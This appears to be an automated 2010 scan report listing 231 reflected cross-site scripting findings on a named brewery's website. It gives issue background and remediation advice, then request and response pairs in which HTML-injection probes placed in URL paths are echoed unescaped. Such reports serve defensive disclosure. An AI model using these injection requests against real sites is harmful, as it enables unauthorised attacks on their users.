Report generated by XSS.CX at Sun Nov 21 16:51:53 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


1. Cross-site scripting (reflected)

1.1. http://www.ninkasibrewing.com/beer_finder/ [REST URL parameter 1]

1.2. http://www.ninkasibrewing.com/beer_finder/content/css/basic.css [REST URL parameter 1]

1.3. http://www.ninkasibrewing.com/beer_finder/content/css/ninkasi.css [REST URL parameter 1]

1.4. http://www.ninkasibrewing.com/beer_finder/content/css/print.css [REST URL parameter 1]

1.5. http://www.ninkasibrewing.com/beer_finder/content/js/basic.js [REST URL parameter 1]

1.6. http://www.ninkasibrewing.com/beer_finder/content/js/combined.css [REST URL parameter 1]

1.7. http://www.ninkasibrewing.com/beer_finder/content/js/combined.js [REST URL parameter 1]

1.8. http://www.ninkasibrewing.com/beers/ [REST URL parameter 1]

1.9. http://www.ninkasibrewing.com/beers/content/css/basic.css [REST URL parameter 1]

1.10. http://www.ninkasibrewing.com/beers/content/css/ninkasi.css [REST URL parameter 1]

1.11. http://www.ninkasibrewing.com/beers/content/css/print.css [REST URL parameter 1]

1.12. http://www.ninkasibrewing.com/beers/content/js/basic.js [REST URL parameter 1]

1.13. http://www.ninkasibrewing.com/beers/content/js/combined.css [REST URL parameter 1]

1.14. http://www.ninkasibrewing.com/beers/content/js/combined.js [REST URL parameter 1]

1.15. http://www.ninkasibrewing.com/brewery/ [REST URL parameter 1]

1.16. http://www.ninkasibrewing.com/brewery/content/css/basic.css [REST URL parameter 1]

1.17. http://www.ninkasibrewing.com/brewery/content/css/ninkasi.css [REST URL parameter 1]

1.18. http://www.ninkasibrewing.com/brewery/content/css/print.css [REST URL parameter 1]

1.19. http://www.ninkasibrewing.com/brewery/content/js/basic.js [REST URL parameter 1]

1.20. http://www.ninkasibrewing.com/brewery/content/js/combined.css [REST URL parameter 1]

1.21. http://www.ninkasibrewing.com/brewery/content/js/combined.js [REST URL parameter 1]

1.22. http://www.ninkasibrewing.com/careers/ [REST URL parameter 1]

1.23. http://www.ninkasibrewing.com/careers/content/css/basic.css [REST URL parameter 1]

1.24. http://www.ninkasibrewing.com/careers/content/css/ninkasi.css [REST URL parameter 1]

1.25. http://www.ninkasibrewing.com/careers/content/css/print.css [REST URL parameter 1]

1.26. http://www.ninkasibrewing.com/careers/content/js/basic.js [REST URL parameter 1]

1.27. http://www.ninkasibrewing.com/careers/content/js/combined.css [REST URL parameter 1]

1.28. http://www.ninkasibrewing.com/careers/content/js/combined.js [REST URL parameter 1]

1.29. http://www.ninkasibrewing.com/company/ [REST URL parameter 1]

1.30. http://www.ninkasibrewing.com/company/content/css/basic.css [REST URL parameter 1]

1.31. http://www.ninkasibrewing.com/company/content/css/ninkasi.css [REST URL parameter 1]

1.32. http://www.ninkasibrewing.com/company/content/css/print.css [REST URL parameter 1]

1.33. http://www.ninkasibrewing.com/company/content/js/basic.js [REST URL parameter 1]

1.34. http://www.ninkasibrewing.com/company/content/js/combined.css [REST URL parameter 1]

1.35. http://www.ninkasibrewing.com/company/content/js/combined.js [REST URL parameter 1]

1.36. http://www.ninkasibrewing.com/contact/ [REST URL parameter 1]

1.37. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]

1.38. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 1]

1.39. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 2]

1.40. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 3]

1.41. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 4]

1.42. http://www.ninkasibrewing.com/contact/content/css/basic.css [name of an arbitrarily supplied request parameter]

1.43. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 1]

1.44. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 2]

1.45. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 3]

1.46. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 4]

1.47. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [name of an arbitrarily supplied request parameter]

1.48. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 1]

1.49. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 2]

1.50. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 3]

1.51. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 4]

1.52. http://www.ninkasibrewing.com/contact/content/css/print.css [name of an arbitrarily supplied request parameter]

1.53. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 1]

1.54. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 2]

1.55. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 3]

1.56. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 4]

1.57. http://www.ninkasibrewing.com/contact/content/js/basic.js [name of an arbitrarily supplied request parameter]

1.58. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 1]

1.59. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 2]

1.60. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 3]

1.61. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 4]

1.62. http://www.ninkasibrewing.com/contact/content/js/combined.css [name of an arbitrarily supplied request parameter]

1.63. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 1]

1.64. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 2]

1.65. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 3]

1.66. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 4]

1.67. http://www.ninkasibrewing.com/contact/content/js/combined.js [name of an arbitrarily supplied request parameter]

1.68. http://www.ninkasibrewing.com/content/ [REST URL parameter 1]

1.69. http://www.ninkasibrewing.com/content/content/css/basic.css [REST URL parameter 1]

1.70. http://www.ninkasibrewing.com/content/content/css/ninkasi.css [REST URL parameter 1]

1.71. http://www.ninkasibrewing.com/content/content/css/print.css [REST URL parameter 1]

1.72. http://www.ninkasibrewing.com/content/content/js/basic.js [REST URL parameter 1]

1.73. http://www.ninkasibrewing.com/content/content/js/combined.css [REST URL parameter 1]

1.74. http://www.ninkasibrewing.com/content/content/js/combined.js [REST URL parameter 1]

1.75. http://www.ninkasibrewing.com/content/css/ [REST URL parameter 1]

1.76. http://www.ninkasibrewing.com/content/css/content/css/basic.css [REST URL parameter 1]

1.77. http://www.ninkasibrewing.com/content/css/content/css/ninkasi.css [REST URL parameter 1]

1.78. http://www.ninkasibrewing.com/content/css/content/css/print.css [REST URL parameter 1]

1.79. http://www.ninkasibrewing.com/content/css/content/js/basic.js [REST URL parameter 1]

1.80. http://www.ninkasibrewing.com/content/css/content/js/combined.css [REST URL parameter 1]

1.81. http://www.ninkasibrewing.com/content/css/content/js/combined.js [REST URL parameter 1]

1.82. http://www.ninkasibrewing.com/content/img/ [REST URL parameter 1]

1.83. http://www.ninkasibrewing.com/content/img/content/css/basic.css [REST URL parameter 1]

1.84. http://www.ninkasibrewing.com/content/img/content/css/ninkasi.css [REST URL parameter 1]

1.85. http://www.ninkasibrewing.com/content/img/content/css/print.css [REST URL parameter 1]

1.86. http://www.ninkasibrewing.com/content/img/content/js/basic.js [REST URL parameter 1]

1.87. http://www.ninkasibrewing.com/content/img/content/js/combined.css [REST URL parameter 1]

1.88. http://www.ninkasibrewing.com/content/img/content/js/combined.js [REST URL parameter 1]

1.89. http://www.ninkasibrewing.com/content/img/skin/ [REST URL parameter 1]

1.90. http://www.ninkasibrewing.com/content/img/skin/content/css/basic.css [REST URL parameter 1]

1.91. http://www.ninkasibrewing.com/content/img/skin/content/css/ninkasi.css [REST URL parameter 1]

1.92. http://www.ninkasibrewing.com/content/img/skin/content/css/print.css [REST URL parameter 1]

1.93. http://www.ninkasibrewing.com/content/img/skin/content/js/basic.js [REST URL parameter 1]

1.94. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.css [REST URL parameter 1]

1.95. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.js [REST URL parameter 1]

1.96. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/ [REST URL parameter 1]

1.97. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1]

1.98. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1]

1.99. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1]

1.100. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1]

1.101. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1]

1.102. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1]

1.103. http://www.ninkasibrewing.com/content/js/ [REST URL parameter 1]

1.104. http://www.ninkasibrewing.com/content/js/basic.js [REST URL parameter 1]

1.105. http://www.ninkasibrewing.com/content/js/combined.js [REST URL parameter 1]

1.106. http://www.ninkasibrewing.com/content/js/content/css/basic.css [REST URL parameter 1]

1.107. http://www.ninkasibrewing.com/content/js/content/css/ninkasi.css [REST URL parameter 1]

1.108. http://www.ninkasibrewing.com/content/js/content/css/print.css [REST URL parameter 1]

1.109. http://www.ninkasibrewing.com/content/js/content/js/basic.js [REST URL parameter 1]

1.110. http://www.ninkasibrewing.com/content/js/content/js/combined.css [REST URL parameter 1]

1.111. http://www.ninkasibrewing.com/content/js/content/js/combined.js [REST URL parameter 1]

1.112. http://www.ninkasibrewing.com/dock_sales/ [REST URL parameter 1]

1.113. http://www.ninkasibrewing.com/dock_sales/content/css/basic.css [REST URL parameter 1]

1.114. http://www.ninkasibrewing.com/dock_sales/content/css/ninkasi.css [REST URL parameter 1]

1.115. http://www.ninkasibrewing.com/dock_sales/content/css/print.css [REST URL parameter 1]

1.116. http://www.ninkasibrewing.com/dock_sales/content/js/basic.js [REST URL parameter 1]

1.117. http://www.ninkasibrewing.com/dock_sales/content/js/combined.css [REST URL parameter 1]

1.118. http://www.ninkasibrewing.com/dock_sales/content/js/combined.js [REST URL parameter 1]

1.119. http://www.ninkasibrewing.com/etc/ [REST URL parameter 1]

1.120. http://www.ninkasibrewing.com/etc/content/css/basic.css [REST URL parameter 1]

1.121. http://www.ninkasibrewing.com/etc/content/css/ninkasi.css [REST URL parameter 1]

1.122. http://www.ninkasibrewing.com/etc/content/css/print.css [REST URL parameter 1]

1.123. http://www.ninkasibrewing.com/etc/content/js/basic.js [REST URL parameter 1]

1.124. http://www.ninkasibrewing.com/etc/content/js/combined.css [REST URL parameter 1]

1.125. http://www.ninkasibrewing.com/etc/content/js/combined.js [REST URL parameter 1]

1.126. http://www.ninkasibrewing.com/facebook/ [REST URL parameter 1]

1.127. http://www.ninkasibrewing.com/facebook/content/ [REST URL parameter 1]

1.128. http://www.ninkasibrewing.com/facebook/content/content/css/basic.css [REST URL parameter 1]

1.129. http://www.ninkasibrewing.com/facebook/content/content/css/ninkasi.css [REST URL parameter 1]

1.130. http://www.ninkasibrewing.com/facebook/content/content/css/print.css [REST URL parameter 1]

1.131. http://www.ninkasibrewing.com/facebook/content/content/js/basic.js [REST URL parameter 1]

1.132. http://www.ninkasibrewing.com/facebook/content/content/js/combined.css [REST URL parameter 1]

1.133. http://www.ninkasibrewing.com/facebook/content/content/js/combined.js [REST URL parameter 1]

1.134. http://www.ninkasibrewing.com/facebook/content/css/ [REST URL parameter 1]

1.135. http://www.ninkasibrewing.com/facebook/content/css/basic.css [REST URL parameter 1]

1.136. http://www.ninkasibrewing.com/facebook/content/css/content/css/basic.css [REST URL parameter 1]

1.137. http://www.ninkasibrewing.com/facebook/content/css/content/css/ninkasi.css [REST URL parameter 1]

1.138. http://www.ninkasibrewing.com/facebook/content/css/content/css/print.css [REST URL parameter 1]

1.139. http://www.ninkasibrewing.com/facebook/content/css/content/js/basic.js [REST URL parameter 1]

1.140. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.css [REST URL parameter 1]

1.141. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.js [REST URL parameter 1]

1.142. http://www.ninkasibrewing.com/facebook/content/css/ninkasi.css [REST URL parameter 1]

1.143. http://www.ninkasibrewing.com/facebook/content/css/print.css [REST URL parameter 1]

1.144. http://www.ninkasibrewing.com/facebook/content/img/ [REST URL parameter 1]

1.145. http://www.ninkasibrewing.com/facebook/content/img/content/css/basic.css [REST URL parameter 1]

1.146. http://www.ninkasibrewing.com/facebook/content/img/content/css/ninkasi.css [REST URL parameter 1]

1.147. http://www.ninkasibrewing.com/facebook/content/img/content/css/print.css [REST URL parameter 1]

1.148. http://www.ninkasibrewing.com/facebook/content/img/content/js/basic.js [REST URL parameter 1]

1.149. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.css [REST URL parameter 1]

1.150. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.js [REST URL parameter 1]

1.151. http://www.ninkasibrewing.com/facebook/content/img/skin/ [REST URL parameter 1]

1.152. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/basic.css [REST URL parameter 1]

1.153. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/ninkasi.css [REST URL parameter 1]

1.154. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/print.css [REST URL parameter 1]

1.155. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/basic.js [REST URL parameter 1]

1.156. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.css [REST URL parameter 1]

1.157. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.js [REST URL parameter 1]

1.158. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/ [REST URL parameter 1]

1.159. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1]

1.160. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1]

1.161. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1]

1.162. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1]

1.163. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1]

1.164. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1]

1.165. http://www.ninkasibrewing.com/facebook/content/js/ [REST URL parameter 1]

1.166. http://www.ninkasibrewing.com/facebook/content/js/basic.js [REST URL parameter 1]

1.167. http://www.ninkasibrewing.com/facebook/content/js/combined.css [REST URL parameter 1]

1.168. http://www.ninkasibrewing.com/facebook/content/js/combined.js [REST URL parameter 1]

1.169. http://www.ninkasibrewing.com/facebook/content/js/content/css/basic.css [REST URL parameter 1]

1.170. http://www.ninkasibrewing.com/facebook/content/js/content/css/ninkasi.css [REST URL parameter 1]

1.171. http://www.ninkasibrewing.com/facebook/content/js/content/css/print.css [REST URL parameter 1]

1.172. http://www.ninkasibrewing.com/facebook/content/js/content/js/basic.js [REST URL parameter 1]

1.173. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.css [REST URL parameter 1]

1.174. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.js [REST URL parameter 1]

1.175. http://www.ninkasibrewing.com/help/ [REST URL parameter 1]

1.176. http://www.ninkasibrewing.com/help/beer_finder/ [REST URL parameter 1]

1.177. http://www.ninkasibrewing.com/help/content/css/basic.css [REST URL parameter 1]

1.178. http://www.ninkasibrewing.com/help/content/css/ninkasi.css [REST URL parameter 1]

1.179. http://www.ninkasibrewing.com/help/content/css/print.css [REST URL parameter 1]

1.180. http://www.ninkasibrewing.com/help/content/js/basic.js [REST URL parameter 1]

1.181. http://www.ninkasibrewing.com/help/content/js/combined.css [REST URL parameter 1]

1.182. http://www.ninkasibrewing.com/help/content/js/combined.js [REST URL parameter 1]

1.183. http://www.ninkasibrewing.com/home/ [REST URL parameter 1]

1.184. http://www.ninkasibrewing.com/home/content/css/basic.css [REST URL parameter 1]

1.185. http://www.ninkasibrewing.com/home/content/css/ninkasi.css [REST URL parameter 1]

1.186. http://www.ninkasibrewing.com/home/content/css/print.css [REST URL parameter 1]

1.187. http://www.ninkasibrewing.com/home/content/js/basic.js [REST URL parameter 1]

1.188. http://www.ninkasibrewing.com/home/content/js/combined.css [REST URL parameter 1]

1.189. http://www.ninkasibrewing.com/home/content/js/combined.js [REST URL parameter 1]

1.190. http://www.ninkasibrewing.com/media/ [REST URL parameter 1]

1.191. http://www.ninkasibrewing.com/media/content/css/basic.css [REST URL parameter 1]

1.192. http://www.ninkasibrewing.com/media/content/css/ninkasi.css [REST URL parameter 1]

1.193. http://www.ninkasibrewing.com/media/content/css/print.css [REST URL parameter 1]

1.194. http://www.ninkasibrewing.com/media/content/js/basic.js [REST URL parameter 1]

1.195. http://www.ninkasibrewing.com/media/content/js/combined.css [REST URL parameter 1]

1.196. http://www.ninkasibrewing.com/media/content/js/combined.js [REST URL parameter 1]

1.197. http://www.ninkasibrewing.com/merchandise/ [REST URL parameter 1]

1.198. http://www.ninkasibrewing.com/merchandise/content/css/basic.css [REST URL parameter 1]

1.199. http://www.ninkasibrewing.com/merchandise/content/css/ninkasi.css [REST URL parameter 1]

1.200. http://www.ninkasibrewing.com/merchandise/content/css/print.css [REST URL parameter 1]

1.201. http://www.ninkasibrewing.com/merchandise/content/js/basic.js [REST URL parameter 1]

1.202. http://www.ninkasibrewing.com/merchandise/content/js/combined.css [REST URL parameter 1]

1.203. http://www.ninkasibrewing.com/merchandise/content/js/combined.js [REST URL parameter 1]

1.204. http://www.ninkasibrewing.com/nw_local_challenge/ [REST URL parameter 1]

1.205. http://www.ninkasibrewing.com/nw_local_challenge/content/css/basic.css [REST URL parameter 1]

1.206. http://www.ninkasibrewing.com/nw_local_challenge/content/css/ninkasi.css [REST URL parameter 1]

1.207. http://www.ninkasibrewing.com/nw_local_challenge/content/css/print.css [REST URL parameter 1]

1.208. http://www.ninkasibrewing.com/nw_local_challenge/content/js/basic.js [REST URL parameter 1]

1.209. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.css [REST URL parameter 1]

1.210. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.js [REST URL parameter 1]

1.211. http://www.ninkasibrewing.com/process/ [REST URL parameter 1]

1.212. http://www.ninkasibrewing.com/process/content/css/basic.css [REST URL parameter 1]

1.213. http://www.ninkasibrewing.com/process/content/css/ninkasi.css [REST URL parameter 1]

1.214. http://www.ninkasibrewing.com/process/content/css/print.css [REST URL parameter 1]

1.215. http://www.ninkasibrewing.com/process/content/js/basic.js [REST URL parameter 1]

1.216. http://www.ninkasibrewing.com/process/content/js/combined.css [REST URL parameter 1]

1.217. http://www.ninkasibrewing.com/process/content/js/combined.js [REST URL parameter 1]

1.218. http://www.ninkasibrewing.com/tasting_room/ [REST URL parameter 1]

1.219. http://www.ninkasibrewing.com/tasting_room/content/css/basic.css [REST URL parameter 1]

1.220. http://www.ninkasibrewing.com/tasting_room/content/css/ninkasi.css [REST URL parameter 1]

1.221. http://www.ninkasibrewing.com/tasting_room/content/css/print.css [REST URL parameter 1]

1.222. http://www.ninkasibrewing.com/tasting_room/content/js/basic.js [REST URL parameter 1]

1.223. http://www.ninkasibrewing.com/tasting_room/content/js/combined.css [REST URL parameter 1]

1.224. http://www.ninkasibrewing.com/tasting_room/content/js/combined.js [REST URL parameter 1]

1.225. http://www.ninkasibrewing.com/twitter/ [REST URL parameter 1]

1.226. http://www.ninkasibrewing.com/twitter/content/css/basic.css [REST URL parameter 1]

1.227. http://www.ninkasibrewing.com/twitter/content/css/ninkasi.css [REST URL parameter 1]

1.228. http://www.ninkasibrewing.com/twitter/content/css/print.css [REST URL parameter 1]

1.229. http://www.ninkasibrewing.com/twitter/content/js/basic.js [REST URL parameter 1]

1.230. http://www.ninkasibrewing.com/twitter/content/js/combined.css [REST URL parameter 1]

1.231. http://www.ninkasibrewing.com/twitter/content/js/combined.js [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 231 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ninkasibrewing.com/beer_finder/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef6"><a>d1a9d545bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder7cef6"><a>d1a9d545bb1/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder7cef6"><a>d1a9d545bb1_page" class="beer_finder7cef6">
...[SNIP]...

1.2. http://www.ninkasibrewing.com/beer_finder/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19329"><a>8b6dab35f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder19329"><a>8b6dab35f14/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder19329"><a>8b6dab35f14_page" class="beer_finder19329">
...[SNIP]...

1.3. http://www.ninkasibrewing.com/beer_finder/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b114"><a>2a2a038a928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder6b114"><a>2a2a038a928/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder6b114"><a>2a2a038a928_page" class="beer_finder6b114">
...[SNIP]...

1.4. http://www.ninkasibrewing.com/beer_finder/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536f7"><a>2e8ea686748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder536f7"><a>2e8ea686748/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beer_finder536f7"><a>2e8ea686748_page" class="beer_finder536f7">
...[SNIP]...

1.5. http://www.ninkasibrewing.com/beer_finder/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beer_finder/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b6f"><a>5c83f0838cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finderf4b6f"><a>5c83f0838cb/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
